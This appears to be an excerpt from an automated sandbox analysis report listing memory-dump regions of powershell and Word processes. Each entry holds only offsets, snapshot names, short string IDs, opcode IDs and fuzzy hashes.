                                                                  • Instruction Fuzzy Hash: AEF0F676519B8C8FE785DB1CD8690E97F90FF66215B0402A7E54CC7162DA2188488BC1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC475000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC475000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac475000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M_^$M_^$M_^$M_^$M_^
                                                                  • API String ID: 0-2396788759
                                                                  • Opcode ID: f73e6d212c2c3b84914c9cd30220566246546d8ae3423f36caa013e815f6c908
                                                                  • Instruction ID: 6ff40a8d894ed649ea34f11fc0baada8f9415a4c8a59b0fe05ec21d8234905b0
                                                                  • Opcode Fuzzy Hash: f73e6d212c2c3b84914c9cd30220566246546d8ae3423f36caa013e815f6c908
                                                                  • Instruction Fuzzy Hash: E05197F390E7D38FF35A4368586A1A57FE0EF63218B4942F6C08C9B5D3ED19580A42C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC475000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC475000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac475000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M_^5$M_^8$M_^F$M_^I$M_^K
                                                                  • API String ID: 0-2170160206
                                                                  • Opcode ID: 467a3bf947d0bd8b3431e84963978ea4daa9a6ed38a982528ffad7b655969975
                                                                  • Instruction ID: 8478f255d057a389099621f0292da76d3ec907d011dccd31c5857745d07efe61
                                                                  • Opcode Fuzzy Hash: 467a3bf947d0bd8b3431e84963978ea4daa9a6ed38a982528ffad7b655969975
                                                                  • Instruction Fuzzy Hash: 872125B7794165CE92013B7DE829DEC77C4CF9427538987F2D199CF293EC18708A8A84
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC475000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC475000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac475000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M_^$M_^$M_^$M_^
                                                                  • API String ID: 0-1397233021
                                                                  • Opcode ID: 725ed8ea2dd6560fbfea38d3f85c98c452e4cbbe3b83735c8675aa3da08cf212
                                                                  • Instruction ID: 384023d38fc4b36389b185f1f0fd98763c989f89afd2ea3ffcbc2cdb4193cdcd
                                                                  • Opcode Fuzzy Hash: 725ed8ea2dd6560fbfea38d3f85c98c452e4cbbe3b83735c8675aa3da08cf212
                                                                  • Instruction Fuzzy Hash: 7A3180F3A0ABD3DBF65A0318586A0A67FD4EF6361C34D43F6C4989A583FD15580B42C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: fe33f0c8c473a2be2d9394182bab24f5ae435b06600a3c288ae9f84da841b225
                                                                  • Instruction ID: c57bbc8b74cb7c3015e30a13758e6431762ea3b5758ff24ae424973b5b9a2094
                                                                  • Opcode Fuzzy Hash: fe33f0c8c473a2be2d9394182bab24f5ae435b06600a3c288ae9f84da841b225
                                                                  • Instruction Fuzzy Hash: 2A320460B2DA498FF798EB3CC459B79B7D2EF99305F40457AD44EC3296CE28A84187C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: b9373260ed64eeeffa53811d0117823164abb1025532ce9df279b505595ad3c1
                                                                  • Instruction ID: 857e94c638506625582a882c019f5ac35b023c1fa68f6c14d9773a24c4ff9f30
                                                                  • Opcode Fuzzy Hash: b9373260ed64eeeffa53811d0117823164abb1025532ce9df279b505595ad3c1
                                                                  • Instruction Fuzzy Hash: D022F461A2DA498FF798F738C459BB97BD2EF89305F40457AD04EC32D6DE28A80587C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 225e5a56161c844f6effea8a22458ffd06e1d374090e3ce6c5d4f468ba1b438e
                                                                  • Instruction ID: e1e61aa98cb435ce6e110c85815d30bd239a2d317fdab16e7af5c67b6db393ff
                                                                  • Opcode Fuzzy Hash: 225e5a56161c844f6effea8a22458ffd06e1d374090e3ce6c5d4f468ba1b438e
                                                                  • Instruction Fuzzy Hash: C151655061E6C94FE396A77888686767FE5DF97229B1801FBE0CDC71E3DD08480AC382
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9M_^
                                                                  • API String ID: 0-1708477388
                                                                  • Opcode ID: 360eaa90c18568c77c111aa4be9b187a1aff14a86244858dc8c4b6ef456f0eb8
                                                                  • Instruction ID: 19fc1f7bb01b382d1f30451d3c044a608cee2823554b021da491e5b4a2d2d236
                                                                  • Opcode Fuzzy Hash: 360eaa90c18568c77c111aa4be9b187a1aff14a86244858dc8c4b6ef456f0eb8
                                                                  • Instruction Fuzzy Hash: F8617C66A8951ECBE740BB7CE4199FC7BD0EF85329B048276D00DC7397CD28648587D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4M_^
                                                                  • API String ID: 0-2545914641
                                                                  • Opcode ID: 06ee70e90113f9bc86ae77c0c61bc77c91f3ccc45045709143a4320b96d9e7a6
                                                                  • Instruction ID: 20c7bb994dcb397b2d50092b4dc0dec57d2c243a2173d59ced953d4a918aef86
                                                                  • Opcode Fuzzy Hash: 06ee70e90113f9bc86ae77c0c61bc77c91f3ccc45045709143a4320b96d9e7a6
                                                                  • Instruction Fuzzy Hash: 0B513861A1D6860FE396A73CD81A6B53FD5DF87224B0981FBD08DC72A3DC1C9C468392
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <M_^
                                                                  • API String ID: 0-1376500734
                                                                  • Opcode ID: cdbec4b82b9dfb8f0865ea2184265b41c52baac5fde76c9695635b80373bc169
                                                                  • Instruction ID: a23d1d2bdad5cf6db20ddf71b81063c9f8433ab8839b51cf3bffd4e5732bd309
                                                                  • Opcode Fuzzy Hash: cdbec4b82b9dfb8f0865ea2184265b41c52baac5fde76c9695635b80373bc169
                                                                  • Instruction Fuzzy Hash: 85415635A8D68D8FE341FB3CD4A5DF87BA1EF8120A74481B6C04EC73A7DD2864458791
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 8ab3eb41fd9f661a628e5d3307e6c837bc25376d54150a51938608cb9db634bb
                                                                  • Instruction ID: 481d9087bd9b8400c1d15e3b15d8726301caff17fcf1c9dd432eaea826aa7740
                                                                  • Opcode Fuzzy Hash: 8ab3eb41fd9f661a628e5d3307e6c837bc25376d54150a51938608cb9db634bb
                                                                  • Instruction Fuzzy Hash: 0731D561B1C9484FE798E73CD85AB79B6C6EB99315F0406BEE44EC32A3DD649C418381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6
                                                                  • API String ID: 0-1452363761
                                                                  • Opcode ID: 61e1d6c053de0a654140ccc1d1c270de400e7c7cd1f87705c8bd0619e6cdb409
                                                                  • Instruction ID: d925ef1c1f1962354a39592f4bf7e289a5ec7473d48ea146bb6ee445eedb44dd
                                                                  • Opcode Fuzzy Hash: 61e1d6c053de0a654140ccc1d1c270de400e7c7cd1f87705c8bd0619e6cdb409
                                                                  • Instruction Fuzzy Hash: 7C31F851B18A494FF784B7BC981E7BDBBD5EF99310F1042B6E00DC3292DD289D418791
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7d7bb451504e22872390a05c5d24c2f6576e3f62c11813009fb9697cfdaf6c7d
                                                                  • Instruction ID: a3deb5a7bf525d9c2ac6ac9b546a00c6c643f9fe3d610c94d150802e7d91acde
                                                                  • Opcode Fuzzy Hash: 7d7bb451504e22872390a05c5d24c2f6576e3f62c11813009fb9697cfdaf6c7d
                                                                  • Instruction Fuzzy Hash: 0C41C36798D2565BE641BB7CF4798F97BE0DF42239B088277D18DC92A3DC1870894BC8
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 406cda930a84efce5726b30b745397fa8d987836fa0552250fcc5245649f00b7
                                                                  • Instruction ID: eb2618dc7299e9d5bc9508123d30fca30ebe653abae5835cf82428a23643aa50
                                                                  • Opcode Fuzzy Hash: 406cda930a84efce5726b30b745397fa8d987836fa0552250fcc5245649f00b7
                                                                  • Instruction Fuzzy Hash: A321F86294E7894FE342E77CD8798F97FB0AF43214B0882B7D099DA193DC18644987D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ae1bcc552dc7ef3e2f6a6461d917615822380ca54260e43217f82089893f6b9
                                                                  • Instruction ID: ef0b1cd32b0e07e33f0f60fb9948ff4a036da0ff1dde877f7e10a05f59bda839
                                                                  • Opcode Fuzzy Hash: 3ae1bcc552dc7ef3e2f6a6461d917615822380ca54260e43217f82089893f6b9
                                                                  • Instruction Fuzzy Hash: 74A1286674956E8BD700BB7CE8559FD7BA0EF86335B0482B7C14DCA297CD24608ACBD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6735c1a4ff64549613d3531793249f35db3399f3260f0a800e66c870e03a32b7
                                                                  • Instruction ID: 0ec0760a0fe907b4f4373a0ae10319526672113c0b7ee50f09ff38d433d45e7a
                                                                  • Opcode Fuzzy Hash: 6735c1a4ff64549613d3531793249f35db3399f3260f0a800e66c870e03a32b7
                                                                  • Instruction Fuzzy Hash: 7F914966B8955E8AD700BB7CF8199FD7B90EF85336B0482B7C04DCA297CD246086C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: af1f00e7b2fd517f9403985e9e7c5ad291dbb56cab6481748f0e74788fe6247a
                                                                  • Instruction ID: d18987ad3fb5e82c27b059a9b51ed08318fa7efbf42fc84be7c9a216de119a38
                                                                  • Opcode Fuzzy Hash: af1f00e7b2fd517f9403985e9e7c5ad291dbb56cab6481748f0e74788fe6247a
                                                                  • Instruction Fuzzy Hash: 97815966B8951E8AE740BB7CE8199FD7BA0EF85335B048277D04EC6297CD246086CBD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bde91efd7c3932b3df78a68d0cbe05cd74ca6df94672c3bd3da548f85313bb4e
                                                                  • Instruction ID: 3b8997795783e2c05e57823200ecf5cd3f9e2ff061029e9ab2569aab4091bbb5
                                                                  • Opcode Fuzzy Hash: bde91efd7c3932b3df78a68d0cbe05cd74ca6df94672c3bd3da548f85313bb4e
                                                                  • Instruction Fuzzy Hash: 72814A66B8951E8AE740BB7CF8199FD7BA1EF85335B048277D04EC6297CD246086CBD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d0d299f349ec32443167998cda91d3bbd13c16960a382ef1c6d6c41a4a0dc7b1
                                                                  • Instruction ID: e625deffca02084b58f28a3e8748e56646313bd58cb9eaf3a30ee00e91522898
                                                                  • Opcode Fuzzy Hash: d0d299f349ec32443167998cda91d3bbd13c16960a382ef1c6d6c41a4a0dc7b1
                                                                  • Instruction Fuzzy Hash: C4717966B8951E8AE740BB7CE8199FD7BA1EF85335B048277D04EC7293CD246086CBD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f90970c517bb79634baa3b5c4bc8186114696cf3f640c7ebcd8fd10dae11142
                                                                  • Instruction ID: 8ffd070b5113a25676895fd0142777fe10651b2cc05a542c879fb912f6627bb7
                                                                  • Opcode Fuzzy Hash: 7f90970c517bb79634baa3b5c4bc8186114696cf3f640c7ebcd8fd10dae11142
                                                                  • Instruction Fuzzy Hash: 4C517761A8D6C99FE341EB3CC4A49F97FE0EF4120974480B6D08ECB3ABDD2894498791
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb72a3b4f350c47b79691a9968152a00a3e243d41a885ac28352b87c1338f467
                                                                  • Instruction ID: 99859ceb5d14b8b335240bb444794f3bbaf57ef814fa9328af571c6808e2208c
                                                                  • Opcode Fuzzy Hash: eb72a3b4f350c47b79691a9968152a00a3e243d41a885ac28352b87c1338f467
                                                                  • Instruction Fuzzy Hash: 5241C460A18A4D8FEB84EB78C855AF97BE2FF89305F544575D00AD3296CD289845C790
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e700d33157049264a1cc1bcf065ad3ed4ad0b1421bade58a009d2407da13e9d9
                                                                  • Instruction ID: acac22c0599a11619b4f70f41b6cf073b54970f2cf225a8172cc49165308b73a
                                                                  • Opcode Fuzzy Hash: e700d33157049264a1cc1bcf065ad3ed4ad0b1421bade58a009d2407da13e9d9
                                                                  • Instruction Fuzzy Hash: B821E56499C6CD9FE389FB3CC4A5DA97FB2AF85206B9080A5D44FC339BDE285900C751
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.1877481901.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaac480000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 44a1a7aede486e3185a42d7ba019d2fff97effdc92111c200e0447f7a8625d5d
                                                                  • Instruction ID: 3520917ce46ccc291b6c16263c6df7ece33ad614631e1892404189d6dce7dd27
                                                                  • Opcode Fuzzy Hash: 44a1a7aede486e3185a42d7ba019d2fff97effdc92111c200e0447f7a8625d5d
                                                                  • Instruction Fuzzy Hash: 0401491490D7C58FF795A7384C598727FE0DFA2295B0804AAE8DDC61D7D808AA8883D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: ab7545efbdb8c5b193bbc35a606ce1ef119c70c60342c2bd6a4309286b9340d4
                                                                  • Instruction ID: d209da253391e1654d93a5d112ef6342320062561115d11058be9cf66614cee9
                                                                  • Opcode Fuzzy Hash: ab7545efbdb8c5b193bbc35a606ce1ef119c70c60342c2bd6a4309286b9340d4
                                                                  • Instruction Fuzzy Hash: 55320861B29A558FF798EB38C45AA79BBD2FF99304F448579D00EC3292DD28EC018781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: e3d55b9585f438c42d3945ee270c277f95a32fcff06025bb1cfaa1e9486361aa
                                                                  • Instruction ID: dfd8d3bb2a62e1410031ed75ff6fd34b0073f70460c661c408d4ccd92e1f577f
                                                                  • Opcode Fuzzy Hash: e3d55b9585f438c42d3945ee270c277f95a32fcff06025bb1cfaa1e9486361aa
                                                                  • Instruction Fuzzy Hash: E922E7A1A19A558FF798E738C45EAB97BD1EF99304F404579D00EC32D3ED28EC458781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: ab54c9ea2d5eb2e731440ec4907c03f2c27b0f80630a8a2a1426cc183964abb3
                                                                  • Instruction ID: 20932872ca3f5360465dc33f2b6abe4b199e0ad964f708bf6d6310a4e7418bdc
                                                                  • Opcode Fuzzy Hash: ab54c9ea2d5eb2e731440ec4907c03f2c27b0f80630a8a2a1426cc183964abb3
                                                                  • Instruction Fuzzy Hash: 1C51445161E6C58FE396A77898686757FE5EF87229B0804FBE0CDC71A3DD08480AC382
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9N_^
                                                                  • API String ID: 0-1737749909
                                                                  • Opcode ID: ee4449db4616c1e74a6ed83b78ac0e2df47b281e0c4c56f84f1ef10a9816b072
                                                                  • Instruction ID: 02d56e6c9527dde49dac975b5f9faf34bbaad2923d387b16bfd1c154de9192f5
                                                                  • Opcode Fuzzy Hash: ee4449db4616c1e74a6ed83b78ac0e2df47b281e0c4c56f84f1ef10a9816b072
                                                                  • Instruction Fuzzy Hash: 1E613762A895268BE741BBBCE4199FC7FE0EF85325B148536D10EC7393CD28B48687D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4N_^
                                                                  • API String ID: 0-2516135240
                                                                  • Opcode ID: 1be9b772d3e1acc7b9421c03687c879d9540b4f1c32e0aa6cb69fa63d5983343
                                                                  • Instruction ID: defc01a84d85463c505bb313a765b60194197fbcdd5d1860a8f6af0b7ea5902c
                                                                  • Opcode Fuzzy Hash: 1be9b772d3e1acc7b9421c03687c879d9540b4f1c32e0aa6cb69fa63d5983343
                                                                  • Instruction Fuzzy Hash: DB512961A4E6960FE396A73CD81A6B57FD5DF87220B0940FBD08DC72A3DC1C9C468392
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <N_^
                                                                  • API String ID: 0-1347224999
                                                                  • Opcode ID: afde292646a021cbb41f14d237b3260d255adb800dce5b0cc0eae54a3028abcf
                                                                  • Instruction ID: 006c2fb84c272befb5ec80027c3af4e4f6750836cf89a12b7076b433f48e4c02
                                                                  • Opcode Fuzzy Hash: afde292646a021cbb41f14d237b3260d255adb800dce5b0cc0eae54a3028abcf
                                                                  • Instruction Fuzzy Hash: 53416BB2A8D6558FF302E77CE4A9DF93FA0EF8520474084B6C04BC73A7ED28A4458781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 23a21ef4a70a4d05b9073f8593a9a643c06deb55e821fe0dd5ef64105b7f9934
                                                                  • Instruction ID: 19a2f159780c9e60433e66da09c357497e6277505675fbf84e5f682afd6b7877
                                                                  • Opcode Fuzzy Hash: 23a21ef4a70a4d05b9073f8593a9a643c06deb55e821fe0dd5ef64105b7f9934
                                                                  • Instruction Fuzzy Hash: D831F561B1C9584FE798E77CD85AB78B6C6EB99315F0405BEE04EC32A3DD249C418381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6
                                                                  • API String ID: 0-1452363761
                                                                  • Opcode ID: 8e736519cfe55247d85bb8911b358269cdc520920ffde39d3cf18a2e9ac1c5ac
                                                                  • Instruction ID: 84dc39e15fa4c5ceabd0d4c7761664e5b71e4d181e851cd8d9663ce5c3be1cb0
                                                                  • Opcode Fuzzy Hash: 8e736519cfe55247d85bb8911b358269cdc520920ffde39d3cf18a2e9ac1c5ac
                                                                  • Instruction Fuzzy Hash: F231F652B19A194FF784B7BC981EBBDBAD1EF99310F14417AE00DC3292DD289C418781
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cabc6bf1dc56fd86182925692bd80001804b1a6d3421a7618252e58c71c96352
                                                                  • Instruction ID: 2fecf18e6b7eef6d6c583994f4b81d2a32ba8c64a8fa9fcb0cca17f9ba4abb60
                                                                  • Opcode Fuzzy Hash: cabc6bf1dc56fd86182925692bd80001804b1a6d3421a7618252e58c71c96352
                                                                  • Instruction Fuzzy Hash: 7B41F76798C6664BE241BBBCF4798FA7BD0DF412397088177D18DC96A3EC1474898BC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a44c55d339a5f5e3f436afe7690adc4e3ccc7f162c4c582951527ca3c5c68197
                                                                  • Instruction ID: f38fdde7229c4dfe4fffd27e6f4e1a79d09a820eb272cd7e8520a5130dfc4030
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75bcfd527e0bf0664f0fafe1a1f72e95a7a2f8130c35b3d88c6584c7f304b0ca
                                                                  • Instruction ID: 50a3d0665196b7bbfc62ae486a62b4c7d472abf309d56d2fd5300e770a4f0c27
                                                                  • Opcode Fuzzy Hash: 75bcfd527e0bf0664f0fafe1a1f72e95a7a2f8130c35b3d88c6584c7f304b0ca
                                                                  • Instruction Fuzzy Hash: A05190A2A8E7854FE301EB7CD8B59E97FA0EF45204754C4B6D08ACB3D7EC28644987C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 680280710537e820ce9bee63285d86646056c701e3462a20aee971620ecfac37
